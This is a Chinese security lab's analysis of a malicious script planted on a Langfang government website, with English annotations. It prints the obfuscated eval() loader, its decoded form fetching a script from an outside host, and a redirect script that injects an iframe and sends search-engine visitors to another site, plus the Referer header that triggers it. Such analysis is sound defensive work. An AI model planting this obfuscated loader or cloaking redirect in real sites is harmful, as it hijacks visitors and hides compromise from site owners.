廊坊市环境保护局网站挂马分析

反黑实验室在监测到廊坊市环境保护局网站遭到黑客挂马攻击事件后,实验室反黑自由职业者对该挂马事件进行分析。

廊坊市环境保护局网站挂马分析

网站名称

廊坊市环境保护局网站

网站域名

www.lfhbj.gov.cn

挂马页面

http://www.lfhbj.gov.cn/dA871661/l6nAP.aspx

挂马代码

<!-- Stage 1 as injected into the page: a "p,a,c,k,e,d"-style packer. The eval() rebuilds the one-line script shown under 代码解密 below from the 27-token dictionary at the end and executes it; the packing hides the remote host name from the visible page source, which is presumably why it was used. Decoding it offline (replace eval with a print) is the safe way to see the payload. -->
<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('o q=l.n(h,8,k,7,2,6,9,b,8,7,k,i,1,9,9,6,g,d,d,a,a,a,c,8,0,e,e,e,f,c,k,5,4,d,k,k,k,c,3,8,j,h,d,8,k,7,2,6,9,j);m.p(q);',62,27,'102|104|105|106|109|111|112|114|115|116|119|32|46|47|50|51|58|60|61|62|99|String|document|fromCharCode|var|write|xyz'.split('|'),0,{}))</script>

代码解密

<script>
// Stage 2 (the unpacked output of the eval above): the char codes spell out a script tag
// whose src is http://www.sf2223.com/ccc.js, and document.write inserts that tag into the
// page, so the browser fetches and runs the remote file. Encoding the tag as numbers keeps
// the attacker's host name out of any plain-text search of the page source.
var xyz=String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,119,119,119,46,115,102,50,50,50,51,46,99,111,109,47,99,99,99,46,106,115,62,60,47,115,99,114,105,112,116,62);document.write(xyz);
</script>

<!-- What stage 2 leaves in the DOM: an external script tag loading ccc.js from sf2223.com. The listing under 恶意代码 below is presumably the content of that file (not independently verified on this page). -->
<script src=http://www.sf2223.com/ccc.js></script>

恶意代码

// Stage 3 as captured by the analyst (presumably the body of ccc.js loaded above; confirm
// against the fetched file). Runs once per page, guarded by the global js616_, and injects
// an oversized iframe plus a third-party hit counter.
if(typeof(js616_)=='undefined'){
    var js616_ = 'loaded';
    // Never assigned anywhere in this listing, so the polling intervals below never call
    // tiaozhuan_616 on their own; anything that sets it would have to come from another
    // script (possibly the remote click.aspx loaded below) -- unconfirmed.
    var yesdata = '';
    var js616dm = document.domain.toLowerCase();
    // The domain check is effectively dead code: both branches below are identical.
    if(js616dm.indexOf('qq.com')!=-1){
        // Polls every 1 ms; if yesdata ever becomes non-empty, schedules the redirect routine
        // through a string-argument setTimeout (an implicit eval) with ss7272.com as both
        // the page target and the opener target.
        var js616intv = setInterval(function(){if(yesdata!=''){setTimeout("tiaozhuan_616('http://www.ss7272.com','http://www.ss7272.com')",1);}},1);
        // Full-width, 18000px-tall iframe to ss7272.com written straight into the document.
        document.writeln("<iframe border=0 align=center hspace=0 name=searchbar marginwidth=0 marginheight=0 framespacing=0  frameborder=0 scrolling=no width=100% height=18000 src=\"http://www.ss7272.com\"></iframe>");
        // Third-party counter (51yes.com) -- records each load of the infected page; the id
        // is a useful pivot when hunting for other pages injected by the same actor.
        document.write ('<script language="javascript" src="http://count28.51yes.com/click.aspx?id=285659169&logo=1" charset="gb2312"></script>');
    }else{
        // Same three statements as the qq.com branch above.
        var js616intv = setInterval(function(){if(yesdata!=''){setTimeout("tiaozhuan_616('http://www.ss7272.com','http://www.ss7272.com')",1);}},1);
        document.writeln("<iframe border=0 align=center hspace=0 name=searchbar marginwidth=0 marginheight=0 framespacing=0  frameborder=0 scrolling=no width=100% height=18000 src=\"http://www.ss7272.com\"></iframe>");
        document.write ('<script language="javascript" src="http://count28.51yes.com/click.aspx?id=285659169&logo=1" charset="gb2312"></script>');
    }
}
// Redirect routine ("tiaozhuan" is pinyin for "redirect"). Relies on the global js616intv
// created by the loader block above. Behaviour is referrer-conditional: only visitors whose
// Referer contains a search-engine keyword are sent away, which is the classic cloaking
// pattern (a direct visit or an admin check shows the normal page) and is why the 触发执行
// section below reproduces it with a baidu Referer.
//   js616url - URL the current page is sent to
//   js616so  - URL the opener window is sent to (the caller passes the same value for both)
function tiaozhuan_616(js616url,js616so){
    clearInterval(js616intv);
    var js616rfr = document.referrer;

    // match() with a string argument compiles it as an unanchored RegExp, so this is a
    // substring test for any alternative; the short tokens 'so', 'sm' and 'uc' will also
    // match many unrelated referrers.
    if(js616rfr.toLowerCase().match('baidu|google|soso|so|sogou|sm|uc|bing|yahoo|youdao|360|haosou')){
        // Several redundant redirect vectors are written so that at least one works in any
        // browser: opener navigate(), opener location, location.replace(), document.location,
        // and finally a meta refresh.
        document.writeln("<script language=javascript>window.opener.navigate('"+js616so+"');<\/script>");
        document.writeln("<SCRIPT>if(parent.window.opener) parent.window.opener.location='"+js616so+"'; <\/SCRIPT>");
        document.writeln("<script language=\"javascript\">location.replace('"+js616url+"');<\/script>");
        document.writeln("<body>");
        document.writeln("<script language=\"javascript\">document.location='"+js616url+"';<\/script>");
        document.writeln("<\/body>");
        document.writeln("<meta http-equiv=\"refresh\" content=\"0.1;url=\""+js616url+"\">");
    }
}

代码分析

利用加密混淆过的JavaScript脚本在页面中写入一段用于判断页面请求来源的JavaScript脚本:当页面所在域名(document.domain)包含“qq.com”时,将页面和原窗口的跳转地址设置为“http://www.ss7272.com”,否则同样设置为“http://www.ss7272.com”(两个分支的代码完全相同);当请求来源(Referer)包含“baidu”、“google”、“soso”、“so”、“sogou”、“sm”、“uc”、“bing”、“yahoo”、“youdao”、“360”、“haosou”等关键字时,再写入一段JavaScript脚本,使页面和原窗口跳转至上述跳转地址。

触发执行

设置请求头为:Referer:http://www.baidu.com/
